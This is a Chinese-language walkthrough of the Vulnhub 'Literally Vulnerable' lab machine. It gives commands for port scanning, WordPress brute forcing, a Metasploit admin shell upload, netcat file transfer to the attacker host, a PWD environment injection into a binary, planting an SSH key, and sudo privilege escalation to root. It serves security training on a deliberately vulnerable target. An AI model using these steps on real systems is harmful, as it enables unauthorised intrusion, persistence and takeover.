【Vulnhub】Literally Vulnerable

首先 nmap 扫描端口

nmap -p- -A 192.168.149.179

有个 ftp 可以匿名登录

下下来看一下

去扫一下

http://192.168.149.179:65535/

扫出来一个 phpcms

这里有个验证密码才能看的，用之前 ftp 保存下来的密码试一下

wpscan --url http://192.168.149.179:65535/phpcms/ --enumerate

收集一下用户名

wpscan --url http://192.168.149.179:65535/phpcms/ -U user.txt -P pass.txt

爆破一下账号密码

Username: maybeadmin

Password: $EPid%J2L9LufO5

然后登录后台看一下，可以找到另一组账号密码

notadmin:Pa$$w0rd13!&

然后用 msf 连接一下

exploit/unix/webapp/wp_admin_shell_upload

设置以下参数

notadmin

Pa$$w0rd13!&

192.168.149.179

65535

/phpcms

python3 -c 'import pty; pty.spawn("/bin/bash")'  

在 /home/doe目录下有一个 itseasy 文件，执行会返回当前路径

wsl：nc -lvp 10001 >itseasy

靶机：nc 192.168.149.1 10001 <itseasy

把这个文件给弄出来，IDA 打开看一下

C 库函数 char *getenv(const char *name) 搜索 name 所指向的环境字符串，并返回相关的值给字符串，在这里就是 PWD 所指向的，我们可以改一下，从而获得一个 shell

实际上是请求了 PWD（一个 web 靶机，用上了 IDA 我是没想到的）

export PWD=$(/bin/bash)

然后再执行那个文件就能拿到 john 用户的 shell

现在有个问题是 ls，cat 之类的是不回显的，所以考虑一下把 ssh 的 authorized_keys 写成 wsl 的公钥，用 ssh　登上去（john 用户还没有 .ssh 文件夹，新建一个）

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCyab46KTnUD6PBqNHweAB+SfDl36waT1RpkBUB3rcmP7QhRk4EOh0yShEmGCA2fev/A/9BY2LP2nd4EplGNYn14OgHONtXH74fSCqf0QZGMexQ9BkV5pHOTW+nGapxeaUTzyEkQQvDLnLm05Oqx6F9d5pfHIrbfQLBK7J0zY1BpkflT3I8pBzEdzLCWoG4Z62WGKQ0Q0ldm9NkRoEbZSOUxneazHiVa89mORtdtHXRr3nseLOyN17rJh6c2CF8ZtlLHIp12GOl0A6qm0eFW4KSJJvZCdxhX/p83hfCclFw7dckX1n+Q45GjuUF/ZE8IXmKRkwNDxOZalSgFjyYX+RlMr95Ruv8IaMk8tv5+Ut04cquKUgCn/9ksLRyL7+fJFok1EEupo4ZjTx3DlBNdkSch3IPT1XVgZeapqUik7jt5DgeGmGKBF93kE9pLO+2+3l1KntdeZ3abJHXDWzX6/mqRNtvMzdVik0jQGOjnGz1Yck0z9w8BK8BGtZ+917Kvns= 1097179511@qq.com" > authorized_keys

登录成功，舒服了

另外他还藏了个密码，base64解码之后是：john:YZW$s8Y49IB#ZZJ

这时候 sudo -l 可以发现有个文件是可以不需要密码就能 sudo运行的

文件夹只有 www-data 账户可以写入，所以还是要回到 www-data 的 shell，写个 /bin/sh，然后 sudo 一执行就能拿到 root 权限的 shell